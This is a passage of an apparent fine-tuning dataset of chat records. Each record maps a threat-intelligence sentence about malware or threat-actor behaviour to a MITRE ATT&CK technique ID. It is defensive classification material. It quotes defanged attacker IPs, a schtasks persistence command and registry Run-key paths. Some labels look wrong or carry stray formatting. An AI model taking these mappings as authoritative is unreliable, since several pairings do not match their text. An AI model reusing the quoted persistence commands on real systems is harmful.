Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The file collection tool used by RainyDay can utilize native API including \"ReadDirectoryChangeW\" for folder monitoring." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The SHAPESHIFT malware is capable of wiping disks, erasing volumes and deleting files, depending on its configuration" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For C0015, the threat actors used Cobalt Strike and Conti ransomware." }, { "role": "assistant", "content": "T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Command_Create&Inject: This command creates a new process (using a supplied filename as the process name) and then injects malicious code into it" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some variants of use SSL to communicate with C2 servers." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DLL side loading is often used to maintain persistence on the compromised system" }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clop has used a simple XOR operation to decrypt strings." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackEnergy has the capability to communicate over a backup channel via plus.google.com." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To recap, on September 18, 2017, we disclosed that CCleaner had been targeted by cybercriminals, in order to distribute malware via the CCleaner installation file. The altered installation file was downloaded by 2.27 million CCleaner customers worldwide. The malware was introduced to the build server of Piriform, the company developing CCleaner, some time between March 11 and July 4, 2017, prior to Avast’s acquisition of Piriform on July 18, 2017" }, { "role": "assistant", "content": "T1195.002 - Compromise Software Supply Chain" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can inject a malicious DLL into a process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The 0x1 bit in the control flags is used in this module to specify if the download should be done via HTTPS" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted." }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gold Dragon stores information gathered from the endpoint in a file named 1.hwp." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "copies documents under 15MB found on the victim system to is the user's %temp%\\SMB\\ folder. It also copies files from USB devices to a predefined directory." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exfiltration over control server channel: data is exfiltrated over the control server channel using a custom protocol - Commonly used port: the attackers used common ports such as port 443 for control server communications - Service execution: registers the implant as a service on the victim’s machine - Automated collection: the implant automatically collects data about the victim and sends it to the control server - Data from local system: local system is discovered and data is gathered - Process discovery: implants can list processes running on the system - System time discovery: part of the data reconnaissance method, the system time is also sent to the control server - File deletion:: malware can wipe files indicated by the attacker" }, { "role": "assistant", "content": "T1124 - System Time Discovery', 'T1119 - Automated Collection', 'T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CreepyDrive can use HTTPS for C2 using the Microsoft Graph API." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "However, the campaign that the PDC has recently observed has been delivering this keylogger exclusively" }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Micropsia creates a shortcut to maintain persistence." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Execution through API (Batch file for example). - Application processes discovery with some procedures as the hashes of the name, and directly for the name of the process. File and directory discovery: to search files to encrypt. Encrypt files. Create files" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mofang's malicious spearphishing attachments required a user to open the file after receiving." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For CostaRicto, the threat actors established domains, some of which appeared to spoof legitimate domains." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s data" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbon uses the \"net view\" command." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Watch on Fox News: Hackers may use fake Netflix app to spy on users As users have become more attached to their mobile devices, they want everything on those devices" }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery', 'T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro can use MSI files to execute DLLs." }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LAPSUS$ has leverage NordVPN for its egress points when targeting intended victims." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium has the ability to store its components in the Registry." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Naikon has used administrator credentials for lateral movement in compromised networks." }, { "role": "assistant", "content": "T1078.002 - Domain Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Goopy has checked for the Google Updater process to ensure Goopy was loaded properly." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The loader component is executed via RUNDLL32.EXE" }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has searched for vulnerabilities, tools, and geopolitical trends on Google to target victims." }, { "role": "assistant", "content": "T1593.002 - Search Engines" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Invoke-PSImage can be used to embed payload data within a new image file." }, { "role": "assistant", "content": "T1027.009 - Embedded Payloads" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can use zlib to compress and decompress data." }, { "role": "assistant", "content": "T1560.002 - Archive Collected Data: Archive via Library" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Taidoor can use \"DeleteFileA\" to remove files from infected hosts." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This adversary group is most commonly associated with a custom PowerShell implant identified as Helminth. The Helminth implant is routinely delivered through macro-enabled Microsoft Office documents requiring user interaction to execute an obfuscated Visual Basic Script" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has deployed XMRig Docker images to mine cryptocurrency. TeamTNT has also infected Docker containers and Kubernetes clusters with XMRig, and used RainbowMiner and lolMiner for mining cryptocurrency." }, { "role": "assistant", "content": "T1496 - Resource Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Epic encrypts collected data using a public key framework before sending it over the C2 channel. Some variants encrypt the collected data with AES and encode it with base64 before transmitting it to the C2 server." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil can download a copy of itself from an attacker controlled IP address to the victim machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Javali can read C2 information from Google Documents and YouTube." }, { "role": "assistant", "content": "T1102.001 - Dead Drop Resolver" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may collect information the victim's anti-virus software." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use the Windows API function CreateProcess to execute another process." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A variant is encoded using a simple XOR cipher." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some variants use SSL to encrypt C2 communications." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conficker adds Registry Run keys to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used \"net user\" for account discovery." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZeroT gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Industroyer uses heavily obfuscated code in its Windows Notepad backdoor." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several backdoors achieved persistence by adding a Run key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RDAT can process steganographic images attached to email messages to send and receive C2 commands. RDAT can also embed additional messages within BMP images to communicate with the RDAT operator." }, { "role": "assistant", "content": "T1001.002 - Data Obfuscation via Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Uses 7-Zip to compress stolen data for exfiltration." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DCSrv can compare the current time on an infected host with a configuration value to determine when to start the encryption process." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Get.exe appears to be a custom tool used to scan IP-ranges for HTTP service information. NCC Group and Fox-IT decompiled the tool for analysis. This showed the tool was written in the Python scripting language and packed into a Windows executable file. Though Fox-IT didn’t find any direct occurrences of the tool on the internet, the decompiled code showed strong similarities with the source code of a tool named GetHttpsInfo. GetHttpsInfo scans the internal network for HTTP & HTTPS services. The reconnaissance tool getHttpsInfo is able to discover HTTP servers within the range of a network" }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may store RC4 encrypted configuration information in the Windows Registry." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has been known to use multiple backdoors per campaign." }, { "role": "assistant", "content": "T1108 - Redundant Access" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy backups to make data recovery more difficult. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Attackers have been making use of this exploit in the wild since at least April 17. Initial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. The attackers are downloading the Sodinokibi ransomware. In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79. The 188.166.74[.]218 IP address is also home to a pair of other malicious domains unrelated to this ransomware attack: arg0s-co[.]uk, which is likely a phishing domain, and projectstore[.]guru, a domain with bogus PDF-related Google search results. The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and appears to have been infected and repurposed by the attackers. The attackers were ultimately successful at encrypting a number of systems during this incident. Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CrackMapExec can discover specified filetypes and log files on a targeted system." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hildegard has used xmrig to mine cryptocurrency." }, { "role": "assistant", "content": "T1496 - Resource Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent can use an AES key to encrypt C2 communications." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Endpoint Protection . Patchwork cyberespionage group expands targets from governments to wide range of industries . The Patchwork attack group has been targeting more than just government-associated organizations. Symantec Security Response has been actively monitoring Patchwork, also known as Dropping Elephant, which uses Chinese-themed content as bait to compromise its targets’ networks. A customized website with content related to the Chinese military . The malicious sites link to files hosted on different domains, which appear to be solely used for malicious purposes. The PowerPoint files appear to exploit the Microsoft Windows OLE Package Manager Remote Code Execution Vulnerability (CVE-2014-4114), which was used in the Sandworm attacks against American and European targets in October 2014. The rich text files typically attempt to exploit the Microsoft Office Memory Corruption Vulnerability (CVE-2015-1641), which was patched in April 2015. Users should manually remove any potential dropped files which would typically be named “sysvolinfo.exe”. Malicious Word .doc file Besides the .pps file, the threat actor uses rich text files to deliver the malware. While other researchers have reported that these files exploit CVE-2012-0158, Symantec has also observed CVE-2015-1641 being exploited to drop Backdoor.Steladok. As two file types are used to deliver two different payloads, there are likely multiple individuals or groups contributing to the malware development efforts. Mitigation Users should adhere to the following advice to prevent Patchwork’s attacks from succeeding: - Delete any suspicious-looking emails you receive, especially if they contain links or attachments. Spear-phishing emails are frequently used by cyberespionage attackers as a means of luring victims into opening malicious files" }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "performs thread execution hijacking to inject its orchestrator into a running thread from a remote process. performs a separate injection of its communication module into an Internet accessible process through which it performs C2." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro can block the Deibold Warsaw GAS Tecnologia security tool at the firewall level." }, { "role": "assistant", "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 moved laterally via RDP." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "leveraged PowerShell to download and execute additional scripts for execution." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "More information about the OwaAuth web shell is available in Appendix C" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti Linux variant’s core functionality is within ‘libxselinux’. Upon execution, an embedded configuration is decoded from the data section using a simple XOR cipher. An example Python function to decode this configuration is shown below" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information', 'T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Small Sieve has the ability to add itself to `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift` for persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sibot will delete an associated registry key if a certain server response is received." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dacls can collect data on running and parent processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remcos uses the infected hosts as SOCKS5 proxies to allow for tunneling and proxying." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete sends stolen data to the C2 server every 10 minutes." }, { "role": "assistant", "content": "T1029 - Scheduled Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For newer operating systems, events.exe creates task.xml as follows: Then it creates a Windows scheduled task using the following command: schtasks.exe /create /TN \\\"Events\\\\CacheTask_\" /XML \\\"t /F\" At the system registry level, modules achieve persistence by adding themselves into the key: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit when it finds possible add values to the Winlogon subkey, and in HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Activity Manager" }, { "role": "assistant", "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream can use `rundll32` for execution of its components." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The download process is the same with the previous variant, the loader resolves the command and control server IP address using a hardcoded list of DNS servers and then downloads the corresponding file. An interesting addition, in the latest samples, is the use of an alternative command and control server IP address, in case the primary one fails. The alternative IP address is generated by applying a bitwise XOR operation to each byte of the resolved command and control IP address with the byte 0xFE. In addition, as a possible anti-behaviour method, the loader verifies that the command and control server IP address is not ‘127.0.0.1’. Both of these methods are also present in the latest Team9 backdoor variants" }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This campaign is different from prior activity because a new dropper was observed being used by Rocke that is written in Go (Golang) instead of Python. The detection for the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT. It can be seen that only one engine successfully detected it as malicious" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CreepyDrive can use cloud services including OneDrive for data exfiltration." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For all non-removable drives on a victim, executes automated collection of certain files for later exfiltration." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be used to discover services running on a system." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects its process identifier (PID) on the victim." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining 